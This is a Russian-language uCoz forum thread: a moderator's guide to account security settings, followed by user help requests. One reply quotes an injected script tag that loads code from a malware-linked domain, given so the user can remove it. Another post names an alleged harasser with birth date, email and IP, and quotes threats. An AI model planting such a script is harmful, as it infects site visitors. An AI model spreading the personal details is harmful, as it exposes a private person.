Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Безопасность аккаунта (настройки и предостережения) |
| Безопасность аккаунта |
 В системе uCoz очень большое значение уделяется безопасности, как и самой системы, так сайтов находящихся в самой системе.Первичные настройки, то есть те настройки безопасности которые присутствуют на момент создания сайта являются наиболее оптимальными для безопасного функционирования сайта. Безопасность сайта это комплекс мер, которые осуществляются за счет серверной стороны (со стороны системы) и за счет клиентской стороны (со стороны владельца сайта). Если со стороны системы можно гарантировать безопасность сайтов от взломов и прочих неприятностей, то со стороны клиента могут быть вариации. Рассмотрим все настройки сайта, которые отвечают за безопасность. Параметры безопасности Панель управления - Админ-бар - Безопасность Максимальное количество одновременных входов в панель управления: 1 Пароль от панели управления не следует давать никому! В идеальном случае, в панель управления должен иметь доступ только владелец сайта. Если в панель управления сайтом есть доступ другому человеку, то можно значение изменить на 2. Делается это для возможности одновременного входа в панель управления. В противном случае сможет зайти или один или другой Тайм-аут сессии: 1 час Данную настройку лучше оставить как есть, так как при длительном отсутствии активности в панели управления начнет срабатывать защита. Даже не смотря на защиту по тайм-ауту, вы должны помнить золотое правило: если вы закончили работу в панели управления, или вам нужно отойти, или вы решили доделать что-то позже, то всегда обязательно нужно выходить из ПУ путем нажатия кнопки  выход!Уровень безопасности сессии по IP-адресу: Данная настройка отвечает за привязку IP к сессии. То есть вы зашли в панель управления с определенного IP, а тайм-аут сессии настроен на 1 час, в течении этого часа ваш IP будет привязан к данной сессии. При настройках точной фиксации смена IP приведет к прерыванию сессии и вас выбросит из панели управления на страницу входа с ошибкой Изменился Ваш текущий IP-адрес. Изменить параметры привязки сессии можно в разделе "Безопасность" - "Параметры безопасности". По умолчанию стоит средний (фиксация сети класса С). Если ваш провайдер предоставляет вам статичный IP адрес, то можно оставить настройку без изменений, так же если у вас динамический IP и при смене IP меняется только последняя цифра. Если у вас меняются последние две цифры, то можно сменить настройку на низкий уровень(фиксация класса В) . Если же у вас может меняться IP полностью можно поставить без фиксации, при этом контроль по IP на сессию будет снят, что снизит безопасность. Настройку Высокий ( фиксировать по IP точно) ставить не рекомендуется, если вы не уверены в том, что ваш IP не изменяется с определенной периодичностью. Вход в панель только с указанных IP-адресов и подсетей: Данная настройка разрешает вход только с указанного вами IP. Заход в панель управления с других IP (которых нет в списке) будет невозможен Это самая надежная настройка безопасности, но рассчитана она только на статичные IP. Так же во вкладке безопасность можно сменить пароль к FTP, пароль к панели управления, произвести смену владельца сайта и просмотреть логи. Секретный вопрос и ответ и пароль аккаунта Вы должны чётко понимать, что секретный вопрос и ответ - это ваш ключ к аккаунту. С его помощью можно сменить пароли аккаунта, восстанавливать пароль от аккаунта, можно произвести смену владельца сайта, устанавливать пароль на FTP, можно удалять модули, а так же можно полностью удалить сайт. Поэтому секретному вопросу и ответу нужно придавать наиважнейшее значение. Секретный вопрос и ответ наследуется сайтом из вашего uID профиля. То есть какой секретный вопрос в настройках безопасности uID профиля, такой будет и на созданном сайте Секретный вопрос и ответ от вашего аккаунта не должен знать никто кроме вас! Сам секретный вопрос и особенно секретный ответ на этот вопрос не должны быть очевидными. Это значит, что если секретный вопрос звучит как "кличка домашнего животного" ответ на него нельзя было бы узнать изучив ваши профили в соц.сетях и на остальных сайтах, где вы подробно рассказываете о своем любимце по кличке Тузик, имя которого и служит ответом на секретный вопрос. Пароль аккаунта. Важно помнить, что при создании сайта пароль администратора uID профиля является паролем и от ПУ вашего сайта. Если со своего профиля создали много сайтов, получиться, что целая серия сайтов имеет один и тот же пароль от аккаунта, и в случае утечки всего одного единственного пароля администратора uID профиля вы можете иметь проблемы сразу со всеми сайтами. Для таких случаев есть возможность установить отдельный пароль на сайт. Вкладка безопасность - смена пароля аккаунта  При активации данной настройки, все ваши сайты так и останутся привязанными к вашему профилю uID, но при этом сайты могут иметь разные пароли от панели управления. Авторизация а панель управления по адресу //u.to/MQuV Так же можно установить отдельный секретный вопрос и ответ для сайта. Для этого нужно при настройках Способ авторизации: Глобальный пароль для панели управления вашего uID-аккаунта, пройти в настройки безопасности uID профиля и там сменить секретный вопрос и ответ на желаемый для вашего сайта, после этого в ПУ сайта во вкладе безопасность - смена пароля аккаунта, перевести в положение Отдельный пароль ввести пароль для аккунта (отдельный) и сохранить введя при этом ответ на секретный вопрос который вы установили в вебтопе. После этого нужно пройти в настройки безопасности uID профиля и опять сменить секретный вопрос и ответ. Делать это нужно только тем, кто понимает что делает и зачем, а так же тем кто в состоянии запомнить (записать) пароли от множества сайтов плюс секретные вопросы и ответы к каждому. Эти особенности стоит учитывать при передаче сайтов от одного владельца к другому в случае продажи сайта например. Если вам при покупке сайта выдают (даже если правильные ) пароль и секретный вопрос и ответ от сайта, то такая передача считается неправильной и спорной, так как переданный сайт так и остается привязанным к uID профилю прежнего владельца! Правильная передача сайта - это передача сайта с одного uID профиля на другой E-mail: uID профиль и безопасность. В первую очередь вы должны понимать, что E-mail на котором находится uID профиль, а также E-mail который находится в почтовых формах вашего сайта - это не менее важный пункт безопасности вашего сайта, как секретный вопрос и ответ, а так же как и пароль от аккаунта. Безопасности E-mail нужно уделять не меньшее значение, в первую очередь из-за того, что именно на указанный в Контактных данных сайта E-mail приходят письма с восстановлением паролей аккаунта, uID логина и вебтопа, именно этот E-mail является связью со службой поддержки. Из этого следует, что пароль на E-mail, а так же секретный вопрос и ответ должны отличаться от пароля и секретного вопроса и ответа uID аккаунта и не в коем случае не должны быть утеряны. Лучше всего иметь отдельный E-mail, который будет использоваться для uID аккаунта на котором расположены сайты, то есть не публичный посредством которого вы общаетесь с друзьями, используете для социальных сетей и прочих мест. Так же лучше всего иметь отдельный uID профиль для путешествий по сайтам в системе, то есть лучше всего иметь два uID профиля - на одном из них собрать сайты и использовать его для работы с собственными сайтами, а другой - публичный профиль использовать для путешествий по сайтам системы с uID авторизацией. Вывод: Секретный вопрос и ответ - ключ к вашему профилю и ключ к вашим сайтам. Секретный вопрос и ответ знать должны только вы! Секретный вопрос и ответ не должен совпадать с секретным вопрос и ответом вашего E-mail который используется для uID профиля. Секретный вопрос и ответ не должен быть утерян или передан другому человеку! Тоже касается и паролей. Пароль от ПУ категорически не рекомендуется передавать другим лицам, так как и пароль от uID профиля. Пароли не должны совпадать с паролем от E-mail. Не устанавливайте легкие и короткие пароли. Используйте чередование букв и цифр, а так же чередование регистра. Не устанавливайте очевидные ответы на секретные вопросы Сообщение отредактировал webanet - Четверг, 22 Сен 2016, 01:19:34
|
|
Требуется помощь. При входе на мой сайт http://droid.at.ua/ с мобильного телефона, происходит перенаправление на левый сайт - myadroidmaklet точка net. Если попытаться зайти на мой сайт http://droid.at.ua/ с браузера Хром, выскакивает окно с сообшением:
[color=red]Внимание! Обнаружена проблема! droid.at.ua содержит материалы сайта myadroidmaklet.net, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта. В чем проблема и как ее решить? Сообщение отредактировал webanet - Среда, 20 Июн 2012, 15:49:16
|
|
val13, удалите из блока календарь это:
Quote <script type="text/javascript" src="http://myadroidmaklet.net/r.php?l=http%3A%2F%2Fmyadroidmaklet.net%2F?a=t2a4w274z215x2w4u2w423m254l2u266x24344x294w2b4z2e4"></script> Сообщение отредактировал bandjuk - Воскресенье, 10 Июн 2012, 20:02:09
|
|
зачем вам 10 одинаковых скриптов ? зачем запихали это в шаблон вида материала , толку ноль ...
<script type="text/javascript"><!-- google_ad_client = "pub-8479896840165531"; /* 468x60, создано 01.09.11 */ google_ad_slot = "3251629598"; google_ad_width = 468; google_ad_height = 60; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> Сообщение отредактировал Miss_Esq - Воскресенье, 10 Июн 2012, 20:08:04
|
|
|
|
Добрый день! Помогите советом. У меня сложилась следующая ситуация. С пол года назад, у меня на сайте http://dizel.ucoz.com зарегистрировался человек с ником DitriX (естественно при регистрации указал левые данные) его IP адрес: 178.127.45.41 и предложил пообщаться по скайпу. Его скайп ditrix43. Начали общаться, оказалось что у него нет камеры и фотографии его в скайпе нет. Зачем тогда ему нужно было общаться именно по скайпу? Но ничего пережил. Он предложил купить у меня сайт. Продавать я его не собирался поэтому отказал ему. Потом он еще неделю засыпал меня письмами с предложениями поменяться сайтами. Я снова ему отказал и заблокировал на сайте по нику. Буквально через несколько дней, весь интернет был завален объявлениями о продаже моего сайта. Узнал я об этих объявлениях потому, что посещаемость сайта подскочила почти в два раза. Оно вроди-бы ничего в этом плохого и нет. Звонили адекватные люди, объяснял им, что не продаю сайт и на этом все заканчивалось. А в конце мая, с этого самого ай-пи адреса он регистрируется под новым ником - aston, указывая уже другие личные данные. И снова предлагает продать ему сайт. Месяц я ему не отвечал, потом и вовсе заблокировал на сайте, он начал слать предложения о покупке на мои почтовые ящики. Я ни разу не отвечал. Потом он присылает предложение с заоблачной суммой, которой сайт не стоит. Я ему ответил - покупай. От него сразу поступило предложение пообщаться по скайпу. Его скайп был уже aston-85. Оказалось, что в этот раз, у него уже нет ни камеры, ни микрофона. Он мог только переписываться. Он начал рассказывать, что названной им суммы у него нет и предлагать купить сайт за меньшую сумму. Я ему отказал и перестал отвечать на его письма. На сайте и в почтовых ящиках его блокирую. А он паршивец заходит с других ай-пи адресов, регистрируется на сайте и пишет угрожающие письма. О нем знаю только его адрес IP: 178.127.45.41 его почтовый ящик в Яндексе - aston1985@yandex.ru , то что он Антон Лавров 15.05.1985 г.р. и живет в городе Минске. Последнее время, он начал угрожать и моим близким родственникам. Что с ним делать – не знаю? Как выйти из этой ситуации?
Примеры его писем: - И снова сообщения мы читаем и на сообщения не отвечаем, думаешь это чему то поможет?! Я конечно еще подожду немного, но мои нервы не железные и могут сдать. Просто так я сидеть не буду, поверь! Жду ответа на протяжении ранее указанного времени! - Еще раз повторяю, назови вашу реальную цену! Лучше ситуацию решить мирно, если не хотите по плохому. В противном случае я разошлю по нету информацию о том какой вы ...! Мне тут мой знакомый программер, как раз пробил о вас инфу: Вы ФИО… Дата рождения:… Родной город:… Есть сестра… Телефоны:… Там еще куча личного барахла есть, завтра мне ваш адрес подскажут. Надеюсь вы не хотите чтобы в интернете знали…, а то я как раз знаю такой хороший сайт, где сидят троли, которые любят проучить за нехорошие дела. Что сделать, чтоб этот даун отстал? |
|
Vika1862,
Quote Что сделать, чтоб этот даун отстал Quote он начал угрожать PS батька Лукашенко сердитый товариСЧь и если найдёт коса на камень и под расстрел подведёт на раз ... Сообщение отредактировал Miss_Esq - Понедельник, 11 Июн 2012, 09:08:27
|
|
Vika1862, Вы меня пугаете. У меня так же один человек зарегестрировался уже под четырьмя никами с разных айпи адресов. Это за два дня. А перед этим он предложил продать сайт. Я отказала. Думаю надо молчать, если что.Не заводить человека.
Добавлено (17-Июн-2012, 01:33:19) |
|
У меня ситуация нормализировалась. Спасибо этому форуму и еще нескольким подобным форумам. Участники форумов установили по ip адресу, что на этом адресе установлено всего 8 телефонов имеющих выход в интернет. Все они были установлены в одном из отделений Белтелекома в городе Могилеве. Простой телефонный звонок начальнику отделения (обошелся в 7$) позволил урегулировать ситуацию. А Вам MeiLi хочу сказать, что чем лучше у Вас сайт, чем выше его посещаемость, тем больше идиотов и падлецов будут на него заходить. Как это не странно, но в интернете их заначительно больше чем в реальной жизни.
|
|
Vika1862, Спасибо за моральную поддержку. Теперь это чудо прислало мне сообщение, что я ему вчера сайт продала. а меня дома не было. я ему ответила, выключила комп и уехала из дому. Вот сижу спать не идут.Все думаю, смогу ли я завтра зайти на сайт.
|
|
Включи комп, заблокируй его по нику и по известным тебе айпи адресам. Лучше сразу заблокировать всю группу (первые три или две цифры до первой точки) посещаемость сайта конечно немножко упадет. Но через неделю, когда этот гад найдет себе другую жертву, можно сняыть блокировку. И иди себе спокойно спать. Все будет хорошо.
|
|
Quote (webanet) если у вас проблемы, то зайдите на страницу http://aboutworld.at.ua/admin/ и там сделайте f5 5-6 раз и следите какой тип капчи там стоит. должна появиться именно та, какая на скрине. как только появится такой тип набирайте пароль, как наберете пароль то щелкните на капче чтобы сменилась картинка и вводите её. Здравствуйте. Сделал по инструкции несколько раз в разные дни. Все то же - проблема осталась. Капча была только цифровая радужная. Помогите решить проблему, пожалуйста. |
|
Мне сообщили что в интернете есть дубль с которого идут переходы на мой сайт. Человека якобы уже развели на деньги. Продали от моего имени эту страничку как мой сайт. Вот я нашла адрес http://sovetolsvet.ucoz.ru/
Если на что нажимать, то идет переход на мой сайт. Но я такого не создавала. Вот адрес моего сайта. http://sovetotsvet.ucoz.ru/ Что мне делать? Как видите в адресе отличие на одну букву. Сообщение отредактировал MeiLi - Четверг, 21 Июн 2012, 12:10:29
|
| |||